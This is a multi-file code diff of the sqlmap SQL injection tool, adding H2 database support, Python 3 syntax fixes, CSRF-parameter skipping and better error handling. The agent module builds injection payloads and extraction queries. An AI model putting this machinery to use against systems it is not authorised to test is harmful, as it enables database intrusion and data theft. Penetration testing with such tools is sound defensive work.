 warnMsg += "IPv6 address with a tool like ping6 "
@@ -1554,8 +1624,8 @@ def checkInternet():
 content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
 return CHECK_INTERNET_VALUE in (content or "")
 
-def setVerbosity(): # Cross-linked function
+def setVerbosity(): # Cross-referenced function
 raise NotImplementedError
 
-def setWafFunctions(): # Cross-linked function
+def setWafFunctions(): # Cross-referenced function
 raise NotImplementedError
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -43,6 +43,7 @@ from lib.core.common import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.decorators import stackedmethod
 from lib.core.enums import CONTENT_TYPE
 from lib.core.enums import HASHDB_KEYS
 from lib.core.enums import HEURISTIC_TEST
@@ -55,9 +56,11 @@ from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapNotVulnerableException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSkipTargetException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapValueException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import ASP_NET_CONTROL_REGEX
+from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
 from lib.core.settings import IGNORE_PARAMETERS
@@ -68,6 +71,7 @@ from lib.core.settings import REFERER_ALIASES
 from lib.core.settings import USER_AGENT_ALIASES
 from lib.core.target import initTargetEnv
 from lib.core.target import setupTargetEnv
+from lib.utils.hash import crackHashFile
 
 def _selectInjection():
 """
@@ -86,7 +90,7 @@ def _selectInjection():
 if point not in points:
 points[point] = injection
 else:
-for key in points[point].keys():
+for key in points[point]:
 if key != 'data':
 points[point][key] = points[point][key] or injection[key]
 points[point]['data'].update(injection['data'])
@@ -152,12 +156,15 @@ def _formatInjection(inj):
 vector = "%s%s" % (vector, comment)
 data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
 data += " Title: %s\n" % title
-data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
+data += " Payload: %s\n" % urldecode(payload, unsafe="&", spaceplus=(inj.place != PLACE.GET and kb.postSpaceToPlus))
 data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
 
 return data
 
 def _showInjections():
+if conf.wizard and kb.wizardMode:
+kb.wizardMode = False
+
 if kb.testQueryCount > 0:
 header = "sqlmap identified the following injection point(s) with "
 header += "a total of %d HTTP(s) requests" % kb.testQueryCount
@@ -237,19 +244,24 @@ def _saveToResultsFile():
 if key not in results:
 results[key] = []
 
-results[key].extend(injection.data.keys())
+results[key].extend(list(injection.data.keys()))
 
-for key, value in results.items():
-place, parameter, notes = key
-line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)
-conf.resultsFP.write(line)
+try:
+for key, value in results.items():
+place, parameter, notes = key
+line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)
+conf.resultsFP.write(line)
 
 if not results:
 line = "%s,,,,%s" % (conf.url, os.linesep)
 conf.resultsFP.write(line)
 
 conf.resultsFP.flush()
+except IOError as ex:
+errMsg = "unable to write to the results file '%s' ('%s'). " % (conf.resultsFilename, getSafeExString(ex))
+raise SqlmapSystemException(errMsg)
 
+@stackedmethod
 def start():
 """
 This function calls a function that performs checks on both URL
@@ -257,6 +269,9 @@ def start():
 check if they are dynamic and SQL injection affected
 """
 
+if conf.hashFile:
+crackHashFile(conf.hashFile)
+
 if conf.direct:
 initTargetEnv()
 setupTargetEnv()
@@ -283,7 +298,7 @@ def start():
 try:
 
 if conf.checkInternet:
-infoMsg = "[INFO] checking for Internet connection"
+infoMsg = "checking for Internet connection"
 logger.info(infoMsg)
 
 if not checkInternet():
@@ -302,6 +317,7 @@ def start():
 conf.cookie = targetCookie
 conf.httpHeaders = list(initialHeaders)
 conf.httpHeaders.extend(targetHeaders or [])
+conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]
 
 initTargetEnv()
 parseTargetUrl()
@@ -368,9 +384,8 @@ def start():
 conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
 
 else:
-if targetUrl.find("?") > -1:
-firstPart = targetUrl[:targetUrl.find("?")]
-secondPart = targetUrl[targetUrl.find("?") + 1:]
+if '?' in targetUrl:
+firstPart, secondPart = targetUrl.split('?', 1)
 message = "Edit GET data [default: %s]: " % secondPart
 test = readInput(message, default=secondPart)
 test = _randomFillBlankFields(test)
@@ -404,8 +419,7 @@ def start():
 if conf.nullConnection:
 checkNullConnection()
 
-if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
-and (kb.injection.place is None or kb.injection.parameter is None):
+if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
 
 if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
 # NOTE: this is not needed anymore, leaving only to display
@@ -413,7 +427,7 @@ def start():
 checkStability()
 
 # Do a little prioritization reorder of a testable parameter list
-parameters = conf.parameters.keys()
+parameters = list(conf.parameters.keys())
 
 # Order of testing list (first to last)
 orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)
@@ -495,14 +509,14 @@ def start():
 infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
 logger.info(infoMsg)
 
-elif parameter == conf.csrfToken:
+elif conf.csrfToken and re.search(conf.csrfToken, parameter, re.I):
 testSqlInj = False
 
 infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
 logger.info(infoMsg)
 
 # Ignore session-like parameters for --level < 4
-elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
+elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
 testSqlInj = False
 
 infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
@@ -521,7 +535,7 @@ def start():
 
 testSqlInj = False
 else:
-infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
+infoMsg = "%s parameter '%s' appears to be dynamic" % (paramType, parameter)
 logger.info(infoMsg)
 
 kb.testedParams.add(paramKey)
@@ -628,6 +642,9 @@ def start():
 errMsg += "involved (e.g. WAF) maybe you could try to use "
 errMsg += "option '--tamper' (e.g. '--tamper=space2comment')"
 
+if not conf.randomAgent:
+errMsg += " and/or switch '--random-agent'"
+
 raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
 else:
 # Flush the flag
@@ -672,7 +689,7 @@ def start():
 except SqlmapSilentQuitException:
 raise
 
-except SqlmapBaseException, ex:
+except SqlmapBaseException as ex:
 errMsg = getSafeExString(ex)
 
 if conf.multipleTargets:
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -10,6 +10,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.dicts import DBMS_DICT
 from lib.core.enums import DBMS
+from lib.core.exception import SqlmapConnectionException
 from lib.core.settings import MSSQL_ALIASES
 from lib.core.settings import MYSQL_ALIASES
 from lib.core.settings import ORACLE_ALIASES
@@ -21,6 +22,7 @@ from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
 from lib.core.settings import HSQLDB_ALIASES
+from lib.core.settings import H2_ALIASES
 from lib.core.settings import INFORMIX_ALIASES
 from lib.utils.sqlalchemy import SQLAlchemy
 
@@ -46,6 +48,8 @@ from plugins.dbms.db2 import DB2Map
 from plugins.dbms.db2.connector import Connector as DB2Conn
 from plugins.dbms.hsqldb import HSQLDBMap
 from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
+from plugins.dbms.h2 import H2Map
+from plugins.dbms.h2.connector import Connector as H2Conn
 from plugins.dbms.informix import InformixMap
 from plugins.dbms.informix.connector import Connector as InformixConn
 
@@ -56,19 +60,20 @@ def setHandler():
 """
 
 items = [
 (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
 (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
 (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
 (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
 (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
 (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
 (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
 (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
 (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
 (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
 (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
-(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
-]
+(DBMS.H2, H2_ALIASES, H2Map, H2Conn),
+(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
+]
 
 _ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
 if _:
@@ -90,29 +95,41 @@ def setHandler():
 conf.dbmsConnector = Connector()
 
 if conf.direct:
+exception = None
 dialect = DBMS_DICT[dbms][3]
 
 if dialect:
-sqlalchemy = SQLAlchemy(dialect=dialect)
-sqlalchemy.connect()
+try:
+sqlalchemy = SQLAlchemy(dialect=dialect)
+sqlalchemy.connect()
 
 if sqlalchemy.connector:
 conf.dbmsConnector = sqlalchemy
-else:
-try:
-conf.dbmsConnector.connect()
-except NameError:
-pass
-else:
-conf.dbmsConnector.connect()
+except Exception as ex:
+exception = ex
+
+if not dialect or exception:
+try:
+conf.dbmsConnector.connect()
+except Exception as ex:
+if exception:
+raise exception
+else:
+if not isinstance(ex, NameError):
+raise
+else:
+msg = "support for direct connection to '%s' is not available. " % dbms
+msg += "Please rerun with '--dependencies'"
+raise SqlmapConnectionException(msg)
 
 if conf.forceDbms == dbms or handler.checkDbms():
 if kb.resolutionDbms:
 conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
+conf.dbmsHandler._dbms = kb.resolutionDbms
 else:
 conf.dbmsHandler = handler
+conf.dbmsHandler._dbms = dbms
 
-conf.dbmsHandler._dbms = dbms
 break
 else:
 conf.dbmsConnector = None
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -43,6 +43,7 @@ from lib.core.settings import INFERENCE_MARKER
 from lib.core.settings import NULL
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import REPLACEMENT_MARKER
+from lib.core.settings import SINGLE_QUOTE_MARKER
 from lib.core.settings import SLEEP_TIME_MARKER
 from lib.core.unescaper import unescaper
 
@@ -97,6 +98,7 @@ class Agent(object):
 paramString = conf.parameters[place]
 paramDict = conf.paramDict[place]
 origValue = getUnicode(paramDict[parameter])
+newValue = getUnicode(newValue) if newValue else newValue
 
 if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
 paramString = origValue
@@ -105,7 +107,7 @@ class Agent(object):
 else:
 origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
 origValue = origValue[origValue.rfind('/') + 1:]
-for char in ('?', '=', ':', ','):
+for char in ('?', '=', ':', ',', '&'):
 if char in origValue:
 origValue = origValue[origValue.rfind(char) + 1:]
 elif place == PLACE.CUSTOM_POST:
@@ -120,8 +122,8 @@ class Agent(object):
 origValue = _.split('=', 1)[1] if '=' in _ else ""
 elif place == PLACE.CUSTOM_HEADER:
 paramString = origValue
-origValue = origValue.split(kb.customInjectionMark)[0]
 origValue = origValue[origValue.find(',') + 1:]
+origValue = origValue.split(kb.customInjectionMark)[0]
 match = re.search(r"([^;]+)=(?P<value>[^;]*);?\Z", origValue)
 if match:
 origValue = match.group("value")
@@ -141,7 +143,7 @@ class Agent(object):
 match = re.search(r"\A[^ ]+", newValue)
 newValue = newValue[len(match.group() if match else ""):]
 _ = randomInt(2)
-value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1)
+value = "%s%s AND %s LIKE %s" % (origValue, match.group() if match else "", _, _ + 1)
 elif conf.invalidBignum:
 value = randomInt(6)
 elif conf.invalidString:
@@ -197,7 +199,7 @@ class Agent(object):
 regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
 retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
 else:
-retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
+retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), r"%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
 
 if retVal == paramString and urlencode(parameter) != parameter:
 retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
@@ -245,6 +247,9 @@ class Agent(object):
 else:
 query = kb.injection.prefix or prefix or ""
 
+if "SELECT '[RANDSTR]'" in query: # escaping of pre-WHERE prefixes
+query = query.replace("'[RANDSTR]'", unescaper.escape(randomStr(), quote=False))
+
 if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
 query += " "
 
@@ -293,22 +298,29 @@ class Agent(object):
 if payload is None:
 return
 
-_ = (
-("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
-("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
-("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
-)
-payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
+replacements = (
+("[DELIMITER_START]", kb.chars.start),
+("[DELIMITER_STOP]", kb.chars.stop),
+("[AT_REPLACE]", kb.chars.at),
+("[SPACE_REPLACE]", kb.chars.space),
+("[DOLLAR_REPLACE]", kb.chars.dollar),
+("[HASH_REPLACE]", kb.chars.hash_),
+("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
+)
+payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload)
 
-for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
+for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)):
 payload = payload.replace(_, str(randomInt()))
 
-for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
+for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
 payload = payload.replace(_, randomStr())
 
-if origValue is not None and "[ORIGVALUE]" in payload:
+if origValue is not None:
 origValue = getUnicode(origValue)
-payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
+if "[ORIGVALUE]" in payload:
+payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
+if "[ORIGINAL]" in payload:
+payload = getUnicode(payload).replace("[ORIGINAL]", origValue)
 
 if INFERENCE_MARKER in payload:
 if Backend.getIdentifiedDbms() is not None:
@@ -337,6 +349,7 @@ class Agent(object):
 
 if payload:
 payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))
+payload = payload.replace(SINGLE_QUOTE_MARKER, "'")
 
 for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
 payload = payload.replace(_, str(randomInt()))
@@ -361,7 +374,7 @@ class Agent(object):
 rootQuery = queries[Backend.getIdentifiedDbms()]
 hexField = field
 
-if 'hex' in rootQuery:
+if "hex" in rootQuery:
 hexField = rootQuery.hex.query % field
 else:
 warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms()
@@ -530,7 +543,7 @@ class Agent(object):
 fieldsToCastStr = fieldsToCastStr or ""
 
 # Function
-if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
+if re.search(r"\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
 fieldsToCastList = [fieldsToCastStr]
 else:
 fieldsToCastList = splitFields(fieldsToCastStr)
@@ -611,7 +624,7 @@ class Agent(object):
 elif fieldsNoSelect:
 concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
 
-elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB):
+elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2):
 if fieldsExists:
 concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
 concatenatedQuery += "||'%s'" % kb.chars.stop
@@ -622,7 +635,7 @@ class Agent(object):
 concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
 _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
 concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
-concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery)
+concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), r"\g<2>\g<1>\g<3>", concatenatedQuery)
 elif fieldsSelect:
 concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
 concatenatedQuery += "||'%s'" % kb.chars.stop
@@ -634,7 +647,7 @@ class Agent(object):
 concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1)
 concatenatedQuery += "+'%s'" % kb.chars.stop
 elif fieldsSelectTop:
-topNum = re.search("\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
+topNum = re.search(r"\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
 concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1)
 concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1)
 elif fieldsSelectCase:
@@ -810,7 +823,7 @@ class Agent(object):
 limitRegExp2 = None
 
 if (limitRegExp or limitRegExp2) or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
-if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
+if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2):
 limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
 limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
 
@@ -900,14 +913,14 @@ class Agent(object):
 fromFrom = limitedQuery[fromIndex + 1:]
 orderBy = None
 
-if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
+if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2):
 limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
 limitedQuery += " %s" % limitStr
 
 elif Backend.isDbms(DBMS.HSQLDB):
 match = re.search(r"ORDER BY [^ ]+", limitedQuery)
 if match:
-limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip()
+limitedQuery = re.sub(r"\s*%s\s*" % re.escape(match.group(0)), " ", limitedQuery).strip()
 limitedQuery += " %s" % match.group(0)
 
 if query.startswith("SELECT "):
@@ -927,7 +940,7 @@ class Agent(object):
 limitedQuery += " %s" % limitStr
 
 elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
-if not " ORDER BY " in limitedQuery:
+if " ORDER BY " not in limitedQuery:
 limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
 elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
 limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
@@ -1081,7 +1094,7 @@ class Agent(object):
 if conf.dumpWhere and query:
 prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "")
 
-if "%s)" % conf.tbl.upper() in prefix.upper():
+if conf.tbl and "%s)" % conf.tbl.upper() in prefix.upper():
 prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
 elif re.search(r"(?i)\bWHERE\b", prefix):
 prefix += " AND %s" % conf.dumpWhere
@@ -1,20 +1,20 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
import cPickle as pickle
|
import cPickle as pickle
|
||||||
except:
|
except:
|
||||||
import pickle
|
import pickle
|
||||||
|
|
||||||
|
import bz2
|
||||||
import itertools
|
import itertools
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
import tempfile
|
import tempfile
|
||||||
import zlib
|
|
||||||
|
|
||||||
from lib.core.enums import MKSTEMP_PREFIX
|
from lib.core.enums import MKSTEMP_PREFIX
|
||||||
from lib.core.exception import SqlmapSystemException
|
from lib.core.exception import SqlmapSystemException
|
||||||
@@ -52,7 +52,7 @@ class BigArray(list):
|
|||||||
List-like class used for storing large amounts of data (disk cached)
|
List-like class used for storing large amounts of data (disk cached)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self, items=[]):
|
||||||
self.chunks = [[]]
|
self.chunks = [[]]
|
||||||
self.chunk_length = sys.maxint
|
self.chunk_length = sys.maxint
|
||||||
self.cache = None
|
self.cache = None
|
||||||
@@ -60,6 +60,9 @@ class BigArray(list):
|
|||||||
self._os_remove = os.remove
|
self._os_remove = os.remove
|
||||||
self._size_counter = 0
|
self._size_counter = 0
|
||||||
|
|
||||||
|
for item in items:
|
||||||
|
self.append(item)
|
||||||
|
|
||||||
def append(self, value):
|
def append(self, value):
|
||||||
self.chunks[-1].append(value)
|
self.chunks[-1].append(value)
|
||||||
|
|
||||||
@@ -83,11 +86,11 @@ class BigArray(list):
|
|||||||
self.chunks.pop()
|
self.chunks.pop()
|
||||||
try:
|
try:
|
||||||
with open(self.chunks[-1], "rb") as f:
|
with open(self.chunks[-1], "rb") as f:
|
||||||
self.chunks[-1] = pickle.loads(zlib.decompress(f.read()))
|
self.chunks[-1] = pickle.loads(bz2.decompress(f.read()))
|
||||||
except IOError, ex:
|
except IOError as ex:
|
||||||
errMsg = "exception occurred while retrieving data "
|
errMsg = "exception occurred while retrieving data "
|
||||||
errMsg += "from a temporary file ('%s')" % ex.message
|
errMsg += "from a temporary file ('%s')" % ex.message
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
return self.chunks[-1].pop()
|
return self.chunks[-1].pop()
|
||||||
|
|
||||||
@@ -104,15 +107,15 @@ class BigArray(list):
|
|||||||
self.filenames.add(filename)
|
self.filenames.add(filename)
|
||||||
os.close(handle)
|
os.close(handle)
|
||||||
with open(filename, "w+b") as f:
|
with open(filename, "w+b") as f:
|
||||||
f.write(zlib.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))
|
f.write(bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))
|
||||||
return filename
|
return filename
|
||||||
except (OSError, IOError), ex:
|
except (OSError, IOError) as ex:
|
||||||
errMsg = "exception occurred while storing data "
|
errMsg = "exception occurred while storing data "
|
||||||
errMsg += "to a temporary file ('%s'). Please " % ex.message
|
errMsg += "to a temporary file ('%s'). Please " % ex.message
|
||||||
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||||
errMsg += "try to set environment variable 'TEMP' to a location "
|
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||||
errMsg += "writeable by the current user"
|
errMsg += "writeable by the current user"
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def _checkcache(self, index):
|
def _checkcache(self, index):
|
||||||
if (self.cache and self.cache.index != index and self.cache.dirty):
|
if (self.cache and self.cache.index != index and self.cache.dirty):
|
||||||
@@ -122,11 +125,11 @@ class BigArray(list):
|
|||||||
if not (self.cache and self.cache.index == index):
|
if not (self.cache and self.cache.index == index):
|
||||||
try:
|
try:
|
||||||
with open(self.chunks[index], "rb") as f:
|
with open(self.chunks[index], "rb") as f:
|
||||||
self.cache = Cache(index, pickle.loads(zlib.decompress(f.read())), False)
|
self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False)
|
||||||
except IOError, ex:
|
except Exception as ex:
|
||||||
errMsg = "exception occurred while retrieving data "
|
errMsg = "exception occurred while retrieving data "
|
||||||
errMsg += "from a temporary file ('%s')" % ex.message
|
errMsg += "from a temporary file ('%s')" % ex.message
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def __getstate__(self):
|
def __getstate__(self):
|
||||||
return self.chunks, self.filenames
|
return self.chunks, self.filenames
|
||||||
@@ -136,21 +139,16 @@ class BigArray(list):
|
|||||||
self.chunks, self.filenames = state
|
self.chunks, self.filenames = state
|
||||||
|
|
||||||
def __getslice__(self, i, j):
|
def __getslice__(self, i, j):
|
||||||
retval = BigArray()
|
|
||||||
|
|
||||||
i = max(0, len(self) + i if i < 0 else i)
|
i = max(0, len(self) + i if i < 0 else i)
|
||||||
j = min(len(self), len(self) + j if j < 0 else j)
|
j = min(len(self), len(self) + j if j < 0 else j)
|
||||||
|
|
||||||
for _ in xrange(i, j):
|
return BigArray(self[_] for _ in xrange(i, j))
|
||||||
retval.append(self[_])
|
|
||||||
|
|
||||||
return retval
|
|
||||||
|
|
||||||
def __getitem__(self, y):
|
def __getitem__(self, y):
|
||||||
if y < 0:
|
if y < 0:
|
||||||
y += len(self)
|
y += len(self)
|
||||||
|
|
||||||
index = y / self.chunk_length
|
index = y // self.chunk_length
|
||||||
offset = y % self.chunk_length
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
|
|
||||||
@@ -161,7 +159,7 @@ class BigArray(list):
|
|||||||
return self.cache.data[offset]
|
return self.cache.data[offset]
|
||||||
|
|
||||||
def __setitem__(self, y, value):
|
def __setitem__(self, y, value):
|
||||||
index = y / self.chunk_length
|
index = y // self.chunk_length
|
||||||
offset = y % self.chunk_length
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
